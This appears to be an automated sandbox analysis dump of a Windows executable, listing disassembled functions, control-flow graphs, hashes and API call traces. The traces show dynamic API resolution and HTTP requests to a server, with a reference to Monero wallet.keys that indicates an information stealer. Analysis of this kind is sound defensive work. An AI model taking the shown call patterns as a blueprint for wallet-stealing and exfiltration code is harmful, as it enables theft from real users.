                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: dd474eb492dc5a2b9ffe2f5bb6cd618a5222f73994fbb93cb5d93d996085ea6c
                              • Instruction ID: 431258d665d3c1e471b981bdb90723637a88f4f1a413fd53def57a82c6d0708b
                              • Opcode Fuzzy Hash: dd474eb492dc5a2b9ffe2f5bb6cd618a5222f73994fbb93cb5d93d996085ea6c
                              • Instruction Fuzzy Hash: C141FF606C7746BBE738BFA68CE2E9D76675F42BCCF50504AA800522C0CBB065B0E527
                              Function 00144880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 144880-144942 call 15a7a0 call 1447b0 call 15a740 * 5 InternetOpenA StrCmpCA 816 144944 801->816 817 14494b-14494f 801->817 816->817 818 144955-144acd call 158b60 call 15a920 call 15a8a0 call 15a800 * 2 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a920 call 15a8a0 call 15a800 * 2 InternetConnectA 817->818 819 144ecb-144ef3 InternetCloseHandle call 15aad0 call 149ac0 817->819 818->819 905 144ad3-144ad7 818->905 829 144ef5-144f2d call 15a820 call 15a9b0 call 15a8a0 call 15a800 819->829 830 144f32-144fa2 call 158990 * 2 call 15a7a0 call 15a800 * 8 819->830 829->830 906 144ae5 905->906 907 144ad9-144ae3 905->907 908 144aef-144b22 HttpOpenRequestA 906->908 907->908 909 144ebe-144ec5 InternetCloseHandle 908->909 910 144b28-144e28 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a740 call 15a920 * 2 call 15a8a0 call 15a800 * 2 call 15aad0 lstrlen call 15aad0 * 2 lstrlen call 15aad0 HttpSendRequestA 908->910 909->819 1021 144e32-144e5c InternetReadFile 910->1021 1022 144e67-144eb9 InternetCloseHandle call 15a800 1021->1022 1023 144e5e-144e65 1021->1023 1022->909 1023->1022 1024 144e69-144ea7 call 15a9b0 call 15a8a0 call 15a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00144915
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 0014493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00144ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00160DDB,00000000,?,?,00000000,?,",00000000,?,00DDEA90), ref: 00144DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00144E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00144E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00144E49
                              • InternetCloseHandle.WININET(00000000), ref: 00144EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00144EC5
                              • HttpOpenRequestA.WININET(00000000,00DDEB10,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00144B15
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • InternetCloseHandle.WININET(00000000), ref: 00144ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: b8e65e90584eb3bd591b75a424f2f224ba294f730ba4e03bce22569dfe001809
                              • Instruction ID: 42abcf06570d8c4eb43c5fe5b8c474cb509653de4c0696768f69ea2363a49f24
                              • Opcode Fuzzy Hash: b8e65e90584eb3bd591b75a424f2f224ba294f730ba4e03bce22569dfe001809
                              • Instruction Fuzzy Hash: E012EF71990118EADB15EB90DC62FEEB378BF24306F904299B51666091EF702F4DCF62
                              Function 00157850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: be340cf9eae40504951bb02396f81f790f92633716146f5d06efeaf19a37866a
                              • Instruction ID: f7b3356eb9327794f16152f47d8d1cba303e35b31aee6bcdf4c5e62332828fb7
                              • Opcode Fuzzy Hash: be340cf9eae40504951bb02396f81f790f92633716146f5d06efeaf19a37866a
                              • Instruction Fuzzy Hash: 65F04FB1944608EBD714DF98DD4ABAEBBBCEB05711F10025AFA15A2680C77415048BA1
                              Function 00141160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: d8184a02b0c237b144b29bc7124afeabfb2e65a352105482def76ad9a5789803
                              • Instruction ID: d9ce69f1508911dfe59da079247cdb8f2d10115045d4b982186773681608de46
                              • Opcode Fuzzy Hash: d8184a02b0c237b144b29bc7124afeabfb2e65a352105482def76ad9a5789803
                              • Instruction Fuzzy Hash: 39D09E7490430CDBDB04DFE0D9496EDBB7CFB08716F101595ED0562350EB315595CBA6
                              Function 00159C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 159c10-159c1a 634 15a036-15a0ca LoadLibraryA * 8 633->634 635 159c20-15a031 GetProcAddress * 43 633->635 636 15a146-15a14d 634->636 637 15a0cc-15a141 GetProcAddress * 5 634->637 635->634 638 15a216-15a21d 636->638 639 15a153-15a211 GetProcAddress * 8 636->639 637->636 640 15a21f-15a293 GetProcAddress * 5 638->640 641 15a298-15a29f 638->641 639->638 640->641 642 15a2a5-15a332 GetProcAddress * 6 641->642 643 15a337-15a33e 641->643 642->643 644 15a344-15a41a GetProcAddress * 9 643->644 645 15a41f-15a426 643->645 644->645 646 15a4a2-15a4a9 645->646 647 15a428-15a49d GetProcAddress * 5 645->647 648 15a4dc-15a4e3 646->648 649 15a4ab-15a4d7 GetProcAddress * 2 646->649 647->646 650 15a515-15a51c 648->650 651 15a4e5-15a510 GetProcAddress * 2 648->651 649->648 652 15a612-15a619 650->652 653 15a522-15a60d GetProcAddress * 10 650->653 651->650 654 15a67d-15a684 652->654 655 15a61b-15a678 GetProcAddress * 4 652->655 653->652 656 15a686-15a699 GetProcAddress 654->656 657 15a69e-15a6a5 654->657 655->654 656->657 658 15a6a7-15a703 GetProcAddress * 4 657->658 659 15a708-15a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00DC5460), ref: 00159C2D
                              • GetProcAddress.KERNEL32(75900000,00DC51A0), ref: 00159C45
                              • GetProcAddress.KERNEL32(75900000,00DD96C8), ref: 00159C5E
                              • GetProcAddress.KERNEL32(75900000,00DD9620), ref: 00159C76
                              • GetProcAddress.KERNEL32(75900000,00DDCF50), ref: 00159C8E
                              • GetProcAddress.KERNEL32(75900000,00DDD1C0), ref: 00159CA7
                              • GetProcAddress.KERNEL32(75900000,00DCAF68), ref: 00159CBF
                              • GetProcAddress.KERNEL32(75900000,00DDD100), ref: 00159CD7
                              • GetProcAddress.KERNEL32(75900000,00DDD028), ref: 00159CF0
                              • GetProcAddress.KERNEL32(75900000,00DDD118), ref: 00159D08
                              • GetProcAddress.KERNEL32(75900000,00DDD0D0), ref: 00159D20
                              • GetProcAddress.KERNEL32(75900000,00DC5320), ref: 00159D39
                              • GetProcAddress.KERNEL32(75900000,00DC5200), ref: 00159D51
                              • GetProcAddress.KERNEL32(75900000,00DC5360), ref: 00159D69
                              • GetProcAddress.KERNEL32(75900000,00DC51E0), ref: 00159D82
                              • GetProcAddress.KERNEL32(75900000,00DDCF68), ref: 00159D9A
                              • GetProcAddress.KERNEL32(75900000,00DDCF98), ref: 00159DB2
                              • GetProcAddress.KERNEL32(75900000,00DCB058), ref: 00159DCB
                              • GetProcAddress.KERNEL32(75900000,00DC5240), ref: 00159DE3
                              • GetProcAddress.KERNEL32(75900000,00DDD178), ref: 00159DFB
                              • GetProcAddress.KERNEL32(75900000,00DDCF20), ref: 00159E14
                              • GetProcAddress.KERNEL32(75900000,00DDD058), ref: 00159E2C
                              • GetProcAddress.KERNEL32(75900000,00DDD1D8), ref: 00159E44
                              • GetProcAddress.KERNEL32(75900000,00DC5280), ref: 00159E5D
                              • GetProcAddress.KERNEL32(75900000,00DDCFB0), ref: 00159E75
                              • GetProcAddress.KERNEL32(75900000,00DDD0B8), ref: 00159E8D
                              • GetProcAddress.KERNEL32(75900000,00DDD1F0), ref: 00159EA6
                              • GetProcAddress.KERNEL32(75900000,00DDD0E8), ref: 00159EBE
                              • GetProcAddress.KERNEL32(75900000,00DDCFC8), ref: 00159ED6
                              • GetProcAddress.KERNEL32(75900000,00DDD040), ref: 00159EEF
                              • GetProcAddress.KERNEL32(75900000,00DDCF80), ref: 00159F07
                              • GetProcAddress.KERNEL32(75900000,00DDD208), ref: 00159F1F
                              • GetProcAddress.KERNEL32(75900000,00DDCF38), ref: 00159F38
                              • GetProcAddress.KERNEL32(75900000,00DDA4A8), ref: 00159F50
                              • GetProcAddress.KERNEL32(75900000,00DDCFE0), ref: 00159F68
                              • GetProcAddress.KERNEL32(75900000,00DDD088), ref: 00159F81
                              • GetProcAddress.KERNEL32(75900000,00DC52A0), ref: 00159F99
                              • GetProcAddress.KERNEL32(75900000,00DDCFF8), ref: 00159FB1
                              • GetProcAddress.KERNEL32(75900000,00DC52C0), ref: 00159FCA
                              • GetProcAddress.KERNEL32(75900000,00DDD190), ref: 00159FE2
                              • GetProcAddress.KERNEL32(75900000,00DDD010), ref: 00159FFA
                              • GetProcAddress.KERNEL32(75900000,00DC4E00), ref: 0015A013
                              • GetProcAddress.KERNEL32(75900000,00DC50E0), ref: 0015A02B
                              • LoadLibraryA.KERNEL32(00DDD148,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A03D
                              • LoadLibraryA.KERNEL32(00DDD070,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A04E
                              • LoadLibraryA.KERNEL32(00DDD130,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A060
                              • LoadLibraryA.KERNEL32(00DDD0A0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A072
                              • LoadLibraryA.KERNEL32(00DDD1A8,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A083
                              • LoadLibraryA.KERNEL32(00DDD160,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A095
                              • LoadLibraryA.KERNEL32(00DDD4C0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A0A7
                              • LoadLibraryA.KERNEL32(00DDD2B0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A0B8
                              • GetProcAddress.KERNEL32(75FD0000,00DC4FA0), ref: 0015A0DA
                              • GetProcAddress.KERNEL32(75FD0000,00DDD4D8), ref: 0015A0F2
                              • GetProcAddress.KERNEL32(75FD0000,00DD90F0), ref: 0015A10A
                              • GetProcAddress.KERNEL32(75FD0000,00DDD280), ref: 0015A123
                              • GetProcAddress.KERNEL32(75FD0000,00DC4E60), ref: 0015A13B
                              • GetProcAddress.KERNEL32(734B0000,00DCAB30), ref: 0015A160
                              • GetProcAddress.KERNEL32(734B0000,00DC4E20), ref: 0015A179
                              • GetProcAddress.KERNEL32(734B0000,00DCAA18), ref: 0015A191
                              • GetProcAddress.KERNEL32(734B0000,00DDD430), ref: 0015A1A9
                              • GetProcAddress.KERNEL32(734B0000,00DDD478), ref: 0015A1C2
                              • GetProcAddress.KERNEL32(734B0000,00DC4FC0), ref: 0015A1DA
                              • GetProcAddress.KERNEL32(734B0000,00DC5040), ref: 0015A1F2
                              • GetProcAddress.KERNEL32(734B0000,00DDD268), ref: 0015A20B
                              • GetProcAddress.KERNEL32(763B0000,00DC4FE0), ref: 0015A22C
                              • GetProcAddress.KERNEL32(763B0000,00DC4DA0), ref: 0015A244
                              • GetProcAddress.KERNEL32(763B0000,00DDD328), ref: 0015A25D
                              • GetProcAddress.KERNEL32(763B0000,00DDD3A0), ref: 0015A275
                              • GetProcAddress.KERNEL32(763B0000,00DC4F20), ref: 0015A28D
                              • GetProcAddress.KERNEL32(750F0000,00DCAB08), ref: 0015A2B3
                              • GetProcAddress.KERNEL32(750F0000,00DCAA40), ref: 0015A2CB
                              • GetProcAddress.KERNEL32(750F0000,00DDD388), ref: 0015A2E3
                              • GetProcAddress.KERNEL32(750F0000,00DC5160), ref: 0015A2FC
                              • GetProcAddress.KERNEL32(750F0000,00DC5020), ref: 0015A314
                              • GetProcAddress.KERNEL32(750F0000,00DCA9A0), ref: 0015A32C
                              • GetProcAddress.KERNEL32(75A50000,00DDD490), ref: 0015A352
                              • GetProcAddress.KERNEL32(75A50000,00DC4E80), ref: 0015A36A
                              • GetProcAddress.KERNEL32(75A50000,00DD90E0), ref: 0015A382
                              • GetProcAddress.KERNEL32(75A50000,00DDD340), ref: 0015A39B
                              • GetProcAddress.KERNEL32(75A50000,00DDD310), ref: 0015A3B3
                              • GetProcAddress.KERNEL32(75A50000,00DC5060), ref: 0015A3CB
                              • GetProcAddress.KERNEL32(75A50000,00DC5000), ref: 0015A3E4
                              • GetProcAddress.KERNEL32(75A50000,00DDD418), ref: 0015A3FC
                              • GetProcAddress.KERNEL32(75A50000,00DDD2E0), ref: 0015A414
                              • GetProcAddress.KERNEL32(75070000,00DC5180), ref: 0015A436
                              • GetProcAddress.KERNEL32(75070000,00DDD2F8), ref: 0015A44E
                              • GetProcAddress.KERNEL32(75070000,00DDD358), ref: 0015A466
                              • GetProcAddress.KERNEL32(75070000,00DDD3B8), ref: 0015A47F
                              • GetProcAddress.KERNEL32(75070000,00DDD4F0), ref: 0015A497
                              • GetProcAddress.KERNEL32(74E50000,00DC4DE0), ref: 0015A4B8
                              • GetProcAddress.KERNEL32(74E50000,00DC5120), ref: 0015A4D1
                              • GetProcAddress.KERNEL32(75320000,00DC4DC0), ref: 0015A4F2
                              • GetProcAddress.KERNEL32(75320000,00DDD3D0), ref: 0015A50A
                              • GetProcAddress.KERNEL32(6F060000,00DC5100), ref: 0015A530
                              • GetProcAddress.KERNEL32(6F060000,00DC4E40), ref: 0015A548
                              • GetProcAddress.KERNEL32(6F060000,00DC5080), ref: 0015A560
                              • GetProcAddress.KERNEL32(6F060000,00DDD298), ref: 0015A579
                              • GetProcAddress.KERNEL32(6F060000,00DC50A0), ref: 0015A591
                              • GetProcAddress.KERNEL32(6F060000,00DC50C0), ref: 0015A5A9
                              • GetProcAddress.KERNEL32(6F060000,00DC5140), ref: 0015A5C2
                              • GetProcAddress.KERNEL32(6F060000,00DC4EA0), ref: 0015A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0015A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0015A607
                              • GetProcAddress.KERNEL32(74E00000,00DDD2C8), ref: 0015A629
                              • GetProcAddress.KERNEL32(74E00000,00DD8FF0), ref: 0015A641
                              • GetProcAddress.KERNEL32(74E00000,00DDD370), ref: 0015A659
                              • GetProcAddress.KERNEL32(74E00000,00DDD4A8), ref: 0015A672
                              • GetProcAddress.KERNEL32(74DF0000,00DC4EC0), ref: 0015A693
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD3E8), ref: 0015A6B4
                              • GetProcAddress.KERNEL32(6F9C0000,00DC4EE0), ref: 0015A6CD
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD400), ref: 0015A6E5
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD448), ref: 0015A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
